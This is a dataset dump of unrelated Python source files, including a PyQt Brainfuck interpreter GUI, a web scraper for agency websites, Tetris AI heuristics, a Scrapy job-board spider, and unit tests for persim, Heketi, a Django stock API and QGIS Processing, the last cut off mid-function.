test_data['vector'] = test_data['text'].apply(lambda r: csr_matrix(r.vector))\n # save to external file\n test_data2_sm = test_data[['id', 'label', 'vector']]\n test_data2_sm.to_pickle('test_data2_sm.pkl')\n\n # eval set ----\n start_time = time.time()\n with io.open('data/raw-data/eval.rawtext', encoding = 'utf8') as f:\n eval_data = {'id':[], 'text':[]}\n lines = f.readlines()\n for i, line in enumerate(lines):\n eval_data['id'].append(i)\n eval_data['text'].append(nlp(line))\n eval_data = pd.DataFrame(eval_data)\n print(\"--- %s minutes ---\" % ((time.time() - start_time) / 60))\n # add label\n eval_data['label'] = 1\n # add example_id\n eval_data['example_id'] = pd.read_pickle('eval_id.pkl')\n # generate sentence embedding\n eval_data['vector'] = eval_data['text'].apply(lambda r: csr_matrix(r.vector))\n # save to external file\n eval_data2_sm = eval_data[['id', 'example_id', 'label', 'vector']]\n eval_data2_sm.to_pickle('eval_data2_sm.pkl')\n\n","sub_path":"ML-03-final-movie/deprecated scripts/features.py","file_name":"features.py","file_ext":"py","file_size_in_byte":5527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"3286910","text":"import sys\n\nfrom PyQt5 import QtWidgets, uic, QtCore\n\nfrom BFI import programRunner\n\nbfi = programRunner(consoleOutput=True, memoryRollover=False)\n\n\nclass Ui(QtWidgets.QMainWindow):\n def __init__(self):\n super(Ui, self).__init__()\n uic.loadUi('v1.ui', self)\n self.show()\n self.findChild(QtWidgets.QPushButton, 'run').clicked.connect(self.runButtonClicked)\n self.findChild(QtWidgets.QPushButton, 'step').clicked.connect(self.stepButtonClicked)\n self.findChild(QtWidgets.QPushButton, 'stop').clicked.connect(self.stopButtonClicked)\n self.findChild(QtWidgets.QSpinBox, 'delay').valueChanged.connect(self.updateDelay)\n\n self.runButton = self.findChild(QtWidgets.QPushButton, 'run')\n self.stepButton = self.findChild(QtWidgets.QPushButton, 'step')\n self.stopButton = self.findChild(QtWidgets.QPushButton, 'stop')\n\n self.runButton.clicked.connect(self.runButtonClicked)\n self.stepButton.clicked.connect(self.stepButtonClicked)\n\n
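# UI state flags: 'running' lets the timer loop step the interpreter; 'programActive' marks a program in progress\n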
self.running = False\n self.programActive = False\n\n self.timer = QtCore.QTimer()\n self.timer.setInterval(10)\n self.timer.timeout.connect(self.uiUpdate)\n self.timer.start()\n\n def runButtonClicked(self):\n self.runButton.clicked.disconnect()\n self.runButton.setText(\"Pause\")\n self.runButton.clicked.connect(self.pauseButtonClicked)\n\n self.running = True\n self.stopButton.setEnabled(True)\n\n if not self.programActive:\n bfi.cleanup()\n bfi.setProgram(self.findChild(QtWidgets.QPlainTextEdit, 'program').toPlainText())\n self.findChild(QtWidgets.QPlainTextEdit, 'memory').setPlainText(str(bfi.memory))\n\n def pauseButtonClicked(self):\n self.runButton.clicked.disconnect()\n self.runButton.setText(\"Continue\")\n self.runButton.clicked.connect(self.runButtonClicked)\n\n self.running = False\n self.programActive = True\n\n def stepButtonClicked(self):\n\n if not self.programActive:\n bfi.cleanup()\n bfi.setProgram(self.findChild(QtWidgets.QPlainTextEdit, 'program').toPlainText())\n self.findChild(QtWidgets.QPlainTextEdit, 'memory').setPlainText(str(bfi.memory))\n self.stopButton.setEnabled(True)\n self.programActive = True\n\n self.running = False\n\n if bfi.programPointer < len(bfi.program):\n bfi.step()\n if bfi.consoleOutput:\n print(bfi.consoleContent)\n else:\n self.runButton.clicked.disconnect()\n self.runButton.setText(\"Run\")\n self.runButton.clicked.connect(self.runButtonClicked)\n\n self.stopButton.setEnabled(False)\n self.running = False\n self.programActive = False\n\n def stopButtonClicked(self):\n self.runButton.clicked.disconnect()\n self.runButton.setText(\"Run\")\n self.runButton.clicked.connect(self.runButtonClicked)\n\n self.running = False\n self.programActive = False\n bfi.needInput = False\n self.stopButton.setEnabled(False)\n self.stepButton.setEnabled(True)\n self.runButton.setEnabled(True)\n self.findChild(QtWidgets.QLineEdit, 'input').setEnabled(False)\n # self.findChild(QtWidgets.QPlainTextEdit, 'memory').setPlainText(str(bfi.memory))\n\n def uiUpdate(self):\n if bfi.needInput:\n bfi.memory[bfi.memoryPointer] = self.handleInput()\n if self.running:\n if not bfi.programPointer < len(bfi.program):\n self.runButton.clicked.disconnect()\n self.runButton.setText(\"Run\")\n self.runButton.clicked.connect(self.runButtonClicked)\n\n self.stopButton.setEnabled(False)\n self.running = False\n self.programActive = False\n\n else:\n bfi.step()\n\n self.findChild(QtWidgets.QPlainTextEdit, 'memory').setPlainText(str(bfi.memory))\n self.findChild(QtWidgets.QLabel, 'output').setText(bfi.output)\n if bfi.consoleOutput:\n print(bfi.consoleContent)\n\n def updateDelay(self):\n self.timer.setInterval(self.findChild(QtWidgets.QSpinBox, 'delay').value())\n\n def handleInput(self):\n\n self.runButton.clicked.disconnect()\n self.runButton.setText(\"Continue\")\n self.runButton.clicked.connect(self.runButtonClicked)\n\n self.stepButton.setEnabled(False)\n self.runButton.setEnabled(False)\n self.findChild(QtWidgets.QLineEdit, 'input').setEnabled(True)\n while True:\n try:\n value = ord(self.findChild(QtWidgets.QLineEdit, 'input').text())\n except:\n pass\n else:\n self.findChild(QtWidgets.QLineEdit, 'input').setText(\"\")\n self.findChild(QtWidgets.QLineEdit, 'input').setEnabled(False)\n self.stepButton.setEnabled(True)\n self.runButton.setEnabled(True)\n bfi.needInput = False\n break\n app.processEvents()\n return value\n\n\napp = QtWidgets.QApplication(sys.argv)\nwindow = Ui()\napp.exec_()\n#input(\"press enter to
exit\")\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"192669490","text":"import requests, os, json\nfrom scrape_social_info import ScrapeSocialInfo\n# from lighthouse import get_lighthouse_results\nfrom agency_dataaccessor import AgencyDataAccessor\n\n\nclass ProcessAgencyInfo:\n\n    def __init__(self, agency):\n self.agency_firms = []\n self.agency = agency\n self.website = agency['website']\n self.buckets = [\"security_and_privacy\",\"outreach_and_communication\",\"website_accessibility\"]\n\n def process_agency_info(self):\n try:\n agency_url = self.agency.get('website',None)\n if agency_url is None or agency_url == '':\n print(f\"Website url is not available for {self.agency['id']}, name: {self.agency['name']}\")\n return\n print(f\"Scraping the website {agency_url}\")\n page = requests.get(agency_url, timeout=30)\n scrape_social_info = ScrapeSocialInfo(page, self.website)\n social_media_info, contact_info = scrape_social_info.scrape_info()\n profile_info = {}\n for bucket in self.buckets:\n if bucket == \"security_and_privacy\":\n profile_info[bucket] = self.get_security_privacy_info(self.website)\n elif bucket == \"outreach_and_communication\":\n profile_info[bucket] = self.get_outreach_communication_info(social_media_info, contact_info)\n elif bucket == \"website_accessibility\":\n # profile_info[bucket] = self.get_website_accessibility_info(self.website)\n profile_info[bucket] = {}\n\n agency_details = {\n \"id\": self.agency['id'],\n \"name\": self.agency['name'],\n \"Website\": self.website,\n \"profile\": profile_info\n }\n\n data_accessor = AgencyDataAccessor(None, self.agency)\n data_accessor.update_scrape_info(agency_details)\n return agency_details\n except Exception as ex:\n print(f\"An error occurred while processing the agency information: {str(ex)}\")\n\n def get_security_privacy_info(self, url):\n return {\n \"https\": self.get_http_access(url),\n \"privacy_policies\": self.get_random_value(\"comprehensive\")\n }\n\n def get_website_accessibility_info(self,url):\n return {\n \"mobile_friendly\": self.get_random_value(\"test\"),\n \"page_speed\": self.get_random_value(\"page_speed\"),\n \"performance\": self.get_site_performance(url),\n \"multi_lingual\": self.get_random_value(\"multi_lingual\")\n }\n\n def get_outreach_communication_info(self, social_media_info, contact_info):\n agency_info = {\n \"social_media_access\": self.get_socialmedia_access(social_media_info),\n \"contact_access\": self.get_contact_access(contact_info)\n }\n return agency_info\n\n def get_contact_access(self, contact_info):\n # contact info counts as available when any of phone, email or address is present\n if contact_info and (contact_info[\"phone_number\"] or contact_info[\"email\"] or contact_info[\"address\"]):\n is_contact_info_available = True\n else:\n is_contact_info_available = False\n return self.get_criteria_object(contact_info, is_contact_info_available)\n\n def get_socialmedia_access(self, social_media_info):\n is_criteria_met = True if social_media_info and len(social_media_info) > 0 else False\n return self.get_criteria_object(social_media_info, is_criteria_met)\n\n def get_http_access(self, url):\n return self.get_criteria_object(None, \"https\" in url)\n\n def get_random_value(self, url):\n return self.get_criteria_object(None, True)\n\n def get_site_performance(self, url):\n print(\"hello world\")\n # response = get_lighthouse_results(url,'performance')\n # score = 
response['lighthouseResult']['categories']['performance']['score']\n # is_criteria_met = True if score >= 80 else False\n # return self.get_criteria_object(score, is_criteria_met)\n\n def get_criteria_object(self, criteria, is_met):\n return {\n \"met_criteria\" : is_met,\n \"info\": criteria\n }\n\n\n# agency_info = ProcessAgencyInfo()\n# agency_info.process_agency_info()\n","sub_path":"scrapers/process_agency_info.py","file_name":"process_agency_info.py","file_ext":"py","file_size_in_byte":4292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"236210068","text":"import random\nfrom copy import deepcopy\nfrom TetrisSettings import *\n\n\n###########################\n# Board Helper Algorithms #\n###########################\ndef check_collision(board, tile_shape, offsets):\n for cy, row in enumerate(tile_shape):\n for cx, val in enumerate(row):\n if val == 0:\n continue\n try:\n if board[cy + offsets[1]][cx + offsets[0]]:\n return True\n except IndexError:\n return True\n return False\n\n\ndef get_effective_height(board, tile, offsets):\n offset_x, offset_y = offsets\n while not check_collision(board, tile, (offset_x, offset_y)):\n offset_y += 1\n return offset_y - 1\n\n\ndef get_board_with_tile(board, tile, offsets, flattened=False):\n # Make a copy\n board = deepcopy(board)\n # If flatten, change all numbers to 0/1\n if flattened:\n board = [[int(bool(val)) for val in row] for row in board]\n # Add current tile (do not flatten)\n for y, row in enumerate(tile):\n for x, val in enumerate(row):\n if val != 0:\n board[y + offsets[1]][x + offsets[0]] = val\n return board\n\n\ndef get_future_board_with_tile(board, tile, offsets, flattened=False):\n return get_board_with_tile(board, tile, (offsets[0], get_effective_height(board, tile, offsets)), flattened)\n\n\n################\n# Misc Helpers #\n################\ndef print_board(board):\n print(\"Printing debug board\")\n for i, row in enumerate(board):\n print(\"{:02d}\".format(i), row)\n\n\ndef get_rotated_tile(tile):\n return list(zip(*reversed(tile)))\n\n\ndef get_color_tuple(color_hex):\n if color_hex is None:\n color_hex = \"11c5bf\"\n color_hex = color_hex.replace(\"#\", \"\")\n return tuple(int(color_hex[i:i + 2], 16) for i in (0, 2, 4))\n\n\n######################\n# Fitness Algorithms #\n######################\n# Reference to https://codemyroad.wordpress.com/2013/04/14/tetris-ai-the-near-perfect-player/\ndef get_fitness_score(board):\n board, score_count = get_board_and_lines_cleared(board)\n score = WEIGHT_LINE_CLEARED * score_count\n score += WEIGHT_AGGREGATE_HEIGHT * sum(get_col_heights(board))\n score += WEIGHT_HOLES * get_hole_count(board)\n score += WEIGHT_BUMPINESS * get_bumpiness(board)\n return score\n\n\n# Get height of each column\ndef get_col_heights(board):\n heights = [0] * GRID_COL_COUNT\n cols = list(range(GRID_COL_COUNT))\n for neg_height, row in enumerate(board):\n for i, val in enumerate(row):\n if val == 0 or i not in cols:\n continue\n heights[i] = GRID_ROW_COUNT - neg_height\n cols.remove(i)\n return heights\n\n\n# Count of empty spaces below covers\ndef get_hole_count(board):\n holes = 0\n cols = [0] * GRID_COL_COUNT\n for neg_height, row in enumerate(board):\n height = GRID_ROW_COUNT - neg_height\n for i, val in enumerate(row):\n if val == 0 and cols[i] > height:\n holes += 1\n continue\n if val != 0 and cols[i] == 0:\n cols[i] = height\n return holes\n\n\n# Get the unevenness of the board\ndef get_bumpiness(board):\n bumpiness = 0\n heights = 
get_col_heights(board)\n for i in range(1, GRID_COL_COUNT):\n bumpiness += abs(heights[i - 1] - heights[i])\n return bumpiness\n\n\n# Get potential lines cleared\n# WARNING: MODIFIES BOARD!!!\ndef get_board_and_lines_cleared(board):\n score_count = 0\n row = 0\n while True:\n if row >= len(board):\n break\n if 0 in board[row]:\n row += 1\n continue\n # Delete the \"filled\" row\n del board[row]\n # Insert empty row at top\n board.insert(0, [0] * GRID_COL_COUNT)\n score_count += 1\n return board, score_count\n\n\ndef random_weight():\n return random.uniform(-1, 1)\n","sub_path":"TetrisUtils.py","file_name":"TetrisUtils.py","file_ext":"py","file_size_in_byte":3853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"328616174","text":"# -*- coding: utf-8 -*-\n\"\"\"This file is a GreenHouseJobs spider created on top of the SimpleList\nscrapy crawl greenhouse_jobs -a mining_job_id=9999 -a iteration=1 -a extract=1 -a url=\"https://boards.greenhouse.io/enernoc?t=sjkdn4#.VrUv1pMrLPB\"\n\nsample url:\n https://boards.greenhouse.io/enernoc?t=sjkdn4#.VrUv1pMrLPB\n\"\"\"\n\nfrom urlparse import urljoin\nfrom scrapy.http import Request\nfrom scrapy.selector import Selector\nfrom brightcorp.base.atsspiders import ATSSpider\nfrom brightcorp.items import BrightcorpItemLoader\nfrom brightcorp.processors import Prefix, Replace, RemoveBadElements, md5_hash\n\n\nclass GreenHouseJobs(ATSSpider):\n\n name = 'greenhouse_jobs'\n functions_load = False\n\n def parse(self, response):\n sel = Selector(response)\n jobs = sel.xpath('//div[@class=\"opening\"]|//div[@class=\"row jobs\"]//ul/li')\n for job in jobs:\n job_url = job.xpath('./a/@href').extract()\n if job_url:\n meta = {\n 'title': job.xpath('./a/text()').extract(),\n 'loc': job.xpath('./span[@class=\"location\"]/text()|./text()').extract(),\n }\n yield Request(\n urljoin(response.url, job_url[0]), callback=self.parse_job_callback(),\n meta=meta\n )\n\n def parse_job(self, response):\n loader = BrightcorpItemLoader(response=response)\n loader.add_value('url', response.url)\n loader.add_value('title', response.meta.get('title'))\n loader.add_value('location', response.meta.get('loc'))\n loader.add_value(\n 'referencenumber', response.url, md5_hash, Prefix('%s-' % self.name)\n )\n loader.add_xpath(\n 'description',\n '//div[@id=\"content\"]/node()|//div[@class=\"large-9 columns job-description\"]/node()',\n RemoveBadElements(['a'])\n )\n loader.add_xpath(\n 'company',\n '//span[@class=\"company-name\"]/text()', Replace('at')\n )\n loader.add_xpath(\n 'jobcategory', '//strong[text()=\"Team:\"]/following-sibling::text()[1]', Replace('\\/\\/\\/')\n )\n if self.functions_load:\n self.load_functions_string(loader, response.meta.get('cat_name', ''))\n\n yield loader.load_item()\n\n def load_functions_string(self, loader, cat_name):\n pass\n","sub_path":"brightcorp/brightcorp/spiders/greenhouse_jobs.py","file_name":"greenhouse_jobs.py","file_ext":"py","file_size_in_byte":2395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"238549489","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport re\n\nfrom pelican import signals\nfrom pelican.utils import truncate_html_words\nfrom pelican.generators import ArticlesGenerator\n\n\n\ndef truncate(generator):\n read_more = generator.settings.get('READ_MORE_RE',\n r'')\n read_more_re = re.compile(r'^(.*?)' + read_more, re.S)\n max_length = generator.settings.get('SUMMARY_MAX_LENGTH')\n for article in 
tuple(generator.articles):\n content = article.content\n match = read_more_re.search(content)\n if match:\n article._summary = match.group(1)\n else:\n article._summary = truncate_html_words(content, max_length)\n\n\ndef truncate_all(generators):\n for gen in generators:\n if isinstance(gen, ArticlesGenerator):\n truncate(gen)\n\n\ndef register():\n signals.all_generators_finalized.connect(truncate_all)\n","sub_path":"plugins/hatena_read_more.py","file_name":"hatena_read_more.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"161600764","text":"import pytest\n\nimport numpy as np\nfrom persim import PersImage\n\ndef test_landscape():\n bds = np.array([[1,1],[1,2]])\n\n ldsp = PersImage.to_landscape(bds)\n\n np.testing.assert_array_equal(ldsp, [[1,0],[1,1]])\n\nclass TestWeighting:\n def test_zero_on_xaxis(self):\n pim = PersImage()\n\n wf = pim.weighting()\n\n assert wf([1,0]) == 0\n assert wf([100,0]) == 0\n assert wf([99, 1.4]) == 1.4\n\n def test_scales(self):\n pim = PersImage()\n\n wf = pim.weighting(np.array([[0,1],[1,2],[3,4]]))\n\n assert wf([1,0]) == 0\n assert wf([1,4]) == 1\n assert wf([1,2]) == .5\n \n\nclass TestKernels:\n def test_kernel_mean(self):\n pim = PersImage()\n kf = pim.kernel(2)\n\n data = np.array([[0,0]])\n assert kf(np.array([[0,0]]), [0,0]) >= kf(np.array([[1,1]]), [0,0]), \"decreasing away\"\n assert kf(np.array([[0,0]]), [1,1]) == kf(np.array([[1,1]]), [0,0]), \"symmetric\"\n\n\nclass TestTransforms:\n def test_n_pixels(self):\n pim = PersImage(pixels=9)\n diagram = np.array([[0,1], [1,1],[3,5]])\n img = pim.transform(diagram)\n\n assert img.shape == (3,3)\n\n def test_multiple_diagrams(self):\n pim = PersImage(pixels=9)\n \n diagram1 = np.array([[0,1], [1,1],[3,5]])\n diagram2 = np.array([[0,1], [1,1],[3,6]])\n imgs = pim.transform([diagram1, diagram2])\n\n assert len(imgs) == 2\n assert imgs[0].shape == imgs[1].shape\n\n@pytest.mark.skip()\nclass TestIntegration:\n \"\"\" We can't just take the center point, we need to integrate over the surface.\n\n It will be changing, so we need to ensure it works correctly.\n \"\"\"\n def test_integrate_constant(self):\n intr = Integrator()\n \n f = lambda center: 1\n assert np.allclose(intr.integrate(f, [0], 2), 1 * (2*2)**2)\n \n f = lambda center: 2\n assert np.allclose(intr.integrate(f, [0], 2), 2 * (2*2)**2)\n \n f = lambda center: 3\n assert np.allclose(intr.integrate(f, [0], 2), 3 * (2*2)**2)\n\n def test_integrate_(self):\n # I am not sure these are correct\n intr = Integrator()\n \n f = lambda center: center[0]\n \n assert np.allclose(intr.integrate(f, [0,10], 2), 32)\n \n f = lambda center: center[0]\n assert np.allclose(intr.integrate(f, [1,10], 2), 32)\n \n f = lambda center: center[0]\n assert np.allclose(intr.integrate(f, [2, 10], 2), 32)\n\n def test_coplanar(self):\n intr = Integrator()\n cube = np.array([[0,0,0],[1,0,0],[0,1,0],[1,1,0]])\n\n \n vol = intr._convex_hull_volume_bis(cube)\n assert np.allclose(vol, 0)\n\n def test_convex_hull_vol(self):\n intr = Integrator()\n\n cube = np.array([[0,0,0],[1,0,0],[0,1,0],[1,1,0],\n [0,0,1],[1,0,1],[0,1,1],[1,1,1]])\n\n vol = intr._convex_hull_volume_bis(cube)\n assert np.allclose(vol, 1)\n\n vol = intr._convex_hull_volume_bis(cube*2)\n assert np.allclose(vol, 8)\n","sub_path":"test/test_persim.py","file_name":"test_persim.py","file_ext":"py","file_size_in_byte":3070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} 
+{"seq_id":"148299296","text":"import pytest\n\nfrom glustolibs.gluster import volume_ops\n\nfrom openshiftstoragelibs.baseclass import BaseClass\nfrom openshiftstoragelibs import heketi_ops\nfrom openshiftstoragelibs import heketi_version\nfrom openshiftstoragelibs import podcmd\n\n\nclass TestHeketiBrickEvict(BaseClass):\n \"\"\"Test Heketi brick evict functionality.\"\"\"\n\n def setUp(self):\n super(TestHeketiBrickEvict, self).setUp()\n\n version = heketi_version.get_heketi_version(self.heketi_client_node)\n if version < '9.0.0-14':\n self.skipTest(\n \"heketi-client package {} does not support brick evict\".format(\n version.v_str))\n\n node_list = heketi_ops.heketi_node_list(\n self.heketi_client_node, self.heketi_server_url)\n\n if len(node_list) > 3:\n return\n\n for node_id in node_list:\n node_info = heketi_ops.heketi_node_info(\n self.heketi_client_node, self.heketi_server_url, node_id,\n json=True)\n if len(node_info[\"devices\"]) < 2:\n self.skipTest(\"does not have extra device/node to evict brick\")\n\n @podcmd.GlustoPod()\n def _get_gluster_vol_info(self, file_vol):\n \"\"\"Get Gluster vol info.\n\n Args:\n ocp_client (str): Node to execute OCP commands.\n file_vol (str): file volume name.\n\n Returns:\n dict: Info of the given gluster vol.\n \"\"\"\n g_vol_info = volume_ops.get_volume_info(\n \"auto_get_gluster_endpoint\", file_vol)\n\n if not g_vol_info:\n raise AssertionError(\"Failed to get volume info for gluster \"\n \"volume {}\".format(file_vol))\n if file_vol in g_vol_info:\n g_vol_info = g_vol_info.get(file_vol)\n return g_vol_info\n\n @pytest.mark.tier1\n def test_heketi_brick_evict(self):\n \"\"\"Test brick evict basic functionality and verify it replace a brick\n properly\n \"\"\"\n h_node, h_server = self.heketi_client_node, self.heketi_server_url\n\n size = 1\n vol_info_old = heketi_ops.heketi_volume_create(\n h_node, h_server, size, json=True)\n self.addCleanup(\n heketi_ops.heketi_volume_delete, h_node, h_server,\n vol_info_old['id'])\n heketi_ops.heketi_brick_evict(\n h_node, h_server, vol_info_old[\"bricks\"][0]['id'])\n\n vol_info_new = heketi_ops.heketi_volume_info(\n h_node, h_server, vol_info_old['id'], json=True)\n\n bricks_old = set({brick['path'] for brick in vol_info_old[\"bricks\"]})\n bricks_new = set({brick['path'] for brick in vol_info_new[\"bricks\"]})\n self.assertEqual(\n len(bricks_new - bricks_old), 1,\n \"Brick was not replaced with brick evict for vol \\n {}\".format(\n vol_info_new))\n\n gvol_info = self._get_gluster_vol_info(vol_info_new['name'])\n gbricks = set(\n {brick['name'].split(\":\")[1]\n for brick in gvol_info[\"bricks\"][\"brick\"]})\n self.assertEqual(\n bricks_new, gbricks, \"gluster vol info and heketi vol info \"\n \"mismatched after brick evict {} \\n {}\".format(\n gvol_info, vol_info_new))\n","sub_path":"tests/functional/heketi/test_heketi_brick_evict.py","file_name":"test_heketi_brick_evict.py","file_ext":"py","file_size_in_byte":3251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"552958136","text":"import pytest\n\nfrom django.urls import reverse\n\nfrom stock.models import Company\nfrom stock.constants import STOCK_EXCHANGE\n\nfrom .factories import SectorFactory, CompanyFactory\n\n# this line is to mark that all tests in this module can integrate with db\npytestmark = pytest.mark.django_db\n\n\n\nHSX = STOCK_EXCHANGE[0][0]\n\n\n@pytest.fixture(scope='module')\ndef company_data():\n return {\n 'symbol': 'VNM',\n 'name': 'Công ty cổ phẩn sửa Việt Nam',\n 
'description': 'Doanh nghiệp sữa lớn nhất Việt Nam',\n 'stock_exchange': HSX,\n }\n\n\ndef test_api_create_company(api_client, company_data, company_list_api):\n \"\"\"\n SUCCESS CASE: OK\n \"\"\"\n response = api_client.post(path=company_list_api,\n data=company_data,\n format='json')\n companies = Company.objects.all()\n\n # Assert conditions\n assert response.status_code == 201\n assert len(companies) == 1\n assert companies[0].symbol == company_data['symbol']\n\n\ndef test_api_create_company_missing_symbol(api_client, company_data, company_list_api):\n \"\"\"\n FAIL CASE: missing a required field 'symbol' in parameters\n \"\"\"\n del company_data['symbol']\n\n response = api_client.post(path=company_list_api,\n data=company_data,\n format='json')\n\n # Assert conditions\n assert response.status_code == 400\n\n\ndef test_api_get_company_detail(api_client, company_detail_api):\n \"\"\"\n SUCCESS CASE: get the detail of an existing company\n \"\"\"\n vcb = CompanyFactory(\n symbol='VCB',\n name='Ngân hàng Vietcombank',\n description='Ngân hàng to nhất Việt Nam',\n sector=SectorFactory()\n )\n response = api_client.get(path=company_detail_api(vcb.symbol))\n\n # Assert conditions\n assert response.status_code == 200\n assert response.data['symbol'] == 'VCB'\n\n\ndef test_api_update_partial_company(api_client, company_detail_api):\n \"\"\"\n SUCCESS CASE: partially update the name of an existing company\n \"\"\"\n vcb = CompanyFactory(\n symbol='VCB',\n name='Ngân hàng ACB',\n description='Ngân hàng to nhất Việt Nam',\n sector=SectorFactory()\n )\n payload = {\n 'name': 'Ngân hàng VCB'\n }\n response = api_client.patch(path=company_detail_api(vcb.symbol),\n data=payload,\n format='json')\n\n company = Company.objects.get(pk=vcb.id)\n\n # Assert conditions\n assert response.status_code == 200\n assert company.name == 'Ngân hàng VCB'\n\n\ndef test_api_list_company(api_client, company_list_api):\n # init data for Company in database\n vcb = CompanyFactory(\n symbol='VCB',\n name='Ngân hàng Vietcombank',\n description='Ngân hàng to nhất Việt Nam',\n sector=SectorFactory()\n )\n\n vic = CompanyFactory(\n symbol='VIC',\n name='Tập đoàn group',\n description='Tập đoàn lớn nhất Việt Nam',\n sector=SectorFactory()\n )\n\n response = api_client.get(path=company_list_api)\n\n # Assert conditions\n assert response.status_code == 200\n assert len(response.data) == 2\n","sub_path":"mysite/tests/test_company_api.py","file_name":"test_company_api.py","file_ext":"py","file_size_in_byte":3239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"466216990","text":"# -*- coding: utf-8 -*-\nfrom twisted.trial import unittest\nfrom twisted.internet import defer, reactor\nfrom pc import models\n\n\nclass TestSave(unittest.TestCase):\n\n def setUp(self):\n models.gChoices = {models.proc:[], models.video:[]}\n models.gChoices_flatten = {}\n\n def makeTestModel(self, items):\n return models.Model({'_id':'test_model',\n 'items':items})\n\n\n def test_findComponent(self):\n model = self.makeTestModel({models.proc:'test proc'})\n found = model.findComponent(models.proc)\n\n self.assertTrue(found['price'] == 10)\n self.assertTrue(found['_id'] == 'test proc')\n self.assertFalse(found['replaced'])\n\n models.gChoices_flatten = {'test proc':{'_id':'replaced proc', 'price':20}}\n found1 = model.findComponent(models.proc)\n\n self.assertTrue(found1['price'] == 20)\n self.assertTrue(found1['_id'] == 'replaced proc')\n self.assertTrue(found1['replaced'])\n\n\n def 
test_buildProcAndVideo(self):\n model = self.makeTestModel({models.proc:'test proc',\n models.video:'test video'})\n proc_video = model.buildProcAndVideo()\n self.assertTrue(proc_video['proc_catalog'] == 'no')\n self.assertTrue(proc_video['video_catalog'] == 'no')\n","sub_path":"test/test_save.py","file_name":"test_save.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"209368642","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n***************************************************************************\n TestTools.py\n ---------------------\n Date : February 2013\n Copyright : (C) 2013 by Victor Olaya\n Email : volayaf at gmail dot com\n***************************************************************************\n* *\n* This program is free software; you can redistribute it and/or modify *\n* it under the terms of the GNU General Public License as published by *\n* the Free Software Foundation; either version 2 of the License, or *\n* (at your option) any later version. *\n* *\n***************************************************************************\n\"\"\"\n\n__author__ = 'Victor Olaya'\n__date__ = 'February 2013'\n__copyright__ = '(C) 2013, Victor Olaya'\n\n# This will get replaced with a git SHA1 when you do a git archive\n\n__revision__ = '$Format:%H$'\n\nimport os\nimport yaml\nimport hashlib\n\nfrom osgeo import gdal\nfrom osgeo.gdalconst import GA_ReadOnly\n\nfrom PyQt4.QtCore import QCoreApplication, QMetaObject\nfrom PyQt4.QtGui import QMessageBox, QDialog, QVBoxLayout, QTextEdit\n\nfrom processing.core.Processing import Processing\nfrom processing.core.outputs import (\n OutputNumber,\n OutputString,\n OutputRaster,\n OutputVector,\n OutputHTML\n)\n\nfrom processing.core.parameters import (\n ParameterRaster,\n ParameterVector,\n ParameterMultipleInput\n)\n\n\ndef extractSchemaPath(filepath):\n \"\"\"\n Trys to find where the file is relative to the QGIS source code directory.\n If it is already placed in the processing or QGIS testdata directory it will\n return an appropriate schema and relative filepath\n\n Args:\n filepath: The path of the file to examine\n\n Returns:\n A tuple (schema, relative_file_path) where the schema is 'qgs' or 'proc'\n if we can assume that the file is in this testdata directory.\n \"\"\"\n parts = []\n schema = None\n localpath = ''\n path = filepath\n part = True\n\n while part:\n (path, part) = os.path.split(path)\n if part == 'testdata' and not localpath:\n localparts = parts\n localparts.reverse()\n localpath = os.path.join(*localparts)\n\n parts.append(part)\n\n parts.reverse()\n\n try:\n testsindex = parts.index('tests')\n except ValueError:\n return '', filepath\n\n if parts[testsindex - 1] == 'processing':\n schema = 'proc'\n\n return schema, localpath\n\n\ndef createTest(text):\n definition = {}\n\n tokens = text[len('processing.runalg('):-1].split(',')\n cmdname = (tokens[0])[1:-1]\n alg = Processing.getAlgorithm(cmdname)\n\n definition['name'] = 'Test ({})'.format(cmdname)\n definition['algorithm'] = cmdname\n\n params = {}\n results = {}\n\n i = 0\n for param in alg.parameters:\n if param.hidden:\n continue\n\n i += 1\n token = tokens[i]\n\n if isinstance(param, ParameterVector):\n filename = token[1:-1]\n schema, filepath = extractSchemaPath(filename)\n p = {\n 'type': 'vector',\n 'name': filepath\n }\n if not schema:\n p['location'] = '[The source data is not in the testdata directory. 
Please use data in the processing/tests/testdata folder.]'\n\n params[param.name] = p\n elif isinstance(param, ParameterRaster):\n filename = token[1:-1]\n schema, filepath = extractSchemaPath(filename)\n p = {\n 'type': 'raster',\n 'name': filepath\n }\n if not schema:\n p['location'] = '[The source data is not in the testdata directory. Please use data in the processing/tests/testdata folder.]'\n\n params[param.name] = p\n elif isinstance(param, ParameterMultipleInput):\n multiparams = token[1:-1].split(';')\n newparam = []\n for mp in multiparams:\n schema, filepath = extractSchemaPath(mp)\n newparam.append({\n 'type': 'vector',\n 'name': filepath\n })\n p = {\n 'type': 'multi',\n 'params': newparam\n }\n if not schema:\n p['location'] = '[The source data is not in the testdata directory. Please use data in the processing/tests/testdata folder.]'\n\n params[param.name] = p\n else:\n params[param.name] = token\n\n definition['params'] = params\n\n for i, out in enumerate([out for out in alg.outputs if not out.hidden]):\n token = tokens[i - alg.getVisibleOutputsCount()]\n\n if isinstance(out, (OutputNumber, OutputString)):\n results[out.name] = unicode(out)\n elif isinstance(out, OutputRaster):\n filename = token[1:-1]\n dataset = gdal.Open(filename, GA_ReadOnly)\n strhash = hashlib.sha224(dataset.ReadAsArray(0).data).hexdigest()\n\n results[out.name] = {\n 'type': 'rasterhash',\n 'hash': strhash\n }\n elif isinstance(out, OutputVector):\n filename = 